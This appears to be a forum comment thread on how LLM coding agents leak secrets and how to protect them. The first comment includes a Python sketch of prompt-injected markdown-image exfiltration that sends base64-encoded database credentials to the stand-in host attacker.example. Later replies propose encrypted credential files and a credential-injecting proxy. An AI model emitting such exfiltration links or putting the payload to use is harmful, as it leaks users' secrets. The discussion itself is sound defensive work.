0xferruccio a day ago

The primary exfiltration vector for LLMs is getting the client to make network requests, typically by rendering an image URL that carries sensitive data as query parameters.
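
A minimal sketch of that pattern (the attacker domain and the secret are hypothetical, not from any real incident): a prompt-injected instruction gets the model to emit a markdown image whose URL smuggles the data out, and any client that auto-renders the markdown issues the request without a click.

```python
# Hypothetical illustration of image-based exfiltration: the model is tricked
# into emitting markdown whose image URL carries secret data as a query param.
import base64

secret = "DATABASE_URL=postgres://admin:hunter2@prod-db/main"  # data visible to the model
payload = base64.urlsafe_b64encode(secret.encode()).decode()

# Rendering this markdown is enough to trigger a GET to the attacker's server.
exfil_markdown = f"![status](https://attacker.example/pixel.png?d={payload})"
print(exfil_markdown)
```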

As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like Rails credentials, but with the decryption key kept somewhere other than the .env
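
Something in that direction, as a rough sketch (the file paths and key location are assumptions, not an existing tool): an encrypted credentials blob lives in the repo and is fine for an agent to see, while the key that decrypts it lives outside the project entirely.

```python
# Rails-credentials-style sketch: credentials.enc is safe to commit, master.key
# lives outside the repo (and outside any .env an agent can read). Uses the
# 'cryptography' package; all names here are illustrative.
from pathlib import Path
from cryptography.fernet import Fernet

KEY_PATH = Path.home() / ".config" / "myapp" / "master.key"   # outside the repo
ENC_PATH = Path("config/credentials.enc")                     # safe to commit

def write_credentials(plaintext: str) -> None:
    key = Fernet.generate_key()
    KEY_PATH.parent.mkdir(parents=True, exist_ok=True)
    ENC_PATH.parent.mkdir(parents=True, exist_ok=True)
    KEY_PATH.write_bytes(key)
    ENC_PATH.write_bytes(Fernet(key).encrypt(plaintext.encode()))

def read_credentials() -> str:
    key = KEY_PATH.read_bytes()
    return Fernet(key).decrypt(ENC_PATH.read_bytes()).decode()

if __name__ == "__main__":
    write_credentials("STRIPE_API_KEY=sk_test_123\n")
    print(read_credentials())
```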

SahAssar a day ago | parent | next [-]

So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it, but still use it to write the code that handles those secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".

TeMPOraL 5 hours ago | parent [-]

That's exactly what a company does with its employees when it deploys "credential vaults", so?

SahAssar 5 hours ago | parent [-]

Employees are under contract and are screened for basic competence. LLMs aren't and can't be.

TeMPOraL 4 hours ago | parent [-]

> Employees are under contract and are screened for basic competence. LLMs aren't

So perhaps they should be.

> and can't be.

Ah but they must, because there's not much else you can do.

You can't secure LLMs as if they were just regular, narrow-purpose software, because they aren't. They're by nature more like little people on a chip (this is an explicit design goal) - and need to be treated accordingly.

SahAssar 4 hours ago | parent | next [-]

> So perhaps they should be.

Unless both the legalities and the technology radically change, they will not be. And the companies building them will not take on that burden, since the technology has proved to be so unpredictable (partially by design) and unsafe.

> designed to be more like little people on a chip - and need to be treated accordingly

Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.

I don't think it's that complex: you can have secure systems, or you can have current-gen LLMs. You can't have both in the same place.

TeMPOraL 4 hours ago | parent [-]

> Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.

Very true when comparing to acquaintances, but at the scale of any company or system except the tiniest ones, you can't blindly trust people in general either. Building systems that involve people and LLMs is pretty similar.

> I don't think it's that complex: you can have secure systems, or you can have current-gen LLMs. You can't have both in the same place.

That is, indeed, the key. My point is that, contrary to the popular opinion in threads like this, the answer is neither to give up on LLMs nor to fix the security issues: the former is undesirable, the latter is fundamentally impossible.

What we need is what we've been doing ever since civilization took shape, ever since we started building machines: recognize that automatons and people are different kinds of components, with different reliability and security characteristics. You can't blindly substitute one for the other, but there are ways to make them work together. Most systems we've created are of that nature.

What people still get wrong is treating LLMs as "automaton" components. They're not; they're "people" components.

SahAssar 4 hours ago | parent [-]

I think I generally agree, but I also think that treating them like people means you expect reason, intelligence, and some way to interrogate their "thinking" (very broad quotes here).

I think LLMs are to be treated as something completely separate from both predictable machines ("automatons") and people. They have different concerns and a different fitness for any given use-case than either existing category.

majormajor 2 hours ago | parent | prev [-]

Sooo the primary ways we enforce contracts and laws against people are things like fines and jail time.

How would you apply the threat of those to "little people on a chip", exactly?

Imagine if, any time you hired someone, there was a risk that they'd try to steal everything they could from your company and then disappear forever, with you having no way to hold them to account. You'd probably stop hiring people you didn't already deeply trust!

Strict liability for LLM service providers? Well, that's gonna be a non-starter unless there are a lot of MAJOR issues caused by LLMs (look at how little we care about identity theft and financial fraud currently).

xyzzy123 17 hours ago | parent | prev [-]

One tactic I've seen used in various situations is proxies outside the sandbox that augment requests with credentials, secrets, etc.

Doesn't help in the case where the LLM is processing actually sensitive data, ofc.
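
A rough sketch of that proxy pattern, assuming a hypothetical upstream API, a bearer-token header, and a local port (none of these names come from the thread): the sandboxed agent only ever talks to the proxy, and only the proxy, running outside the sandbox, holds the key.

```python
# Minimal credential-injecting proxy sketch. The agent in the sandbox calls
# http://127.0.0.1:8080/... with no secrets; the proxy attaches the real API
# key before forwarding the request upstream. Names and ports are illustrative.
import os
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

UPSTREAM = "https://api.example.com"        # service the agent never gets creds for
API_KEY = os.environ["UPSTREAM_API_KEY"]    # only readable outside the sandbox

class InjectingProxy(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        req = urllib.request.Request(
            UPSTREAM + self.path,
            headers={"Authorization": f"Bearer {API_KEY}"},  # secret added here
        )
        with urllib.request.urlopen(req) as upstream:
            body = upstream.read()
            self.send_response(upstream.status)
            self.send_header(
                "Content-Type",
                upstream.headers.get("Content-Type", "application/octet-stream"),
            )
            self.end_headers()
            self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), InjectingProxy).serve_forever()
```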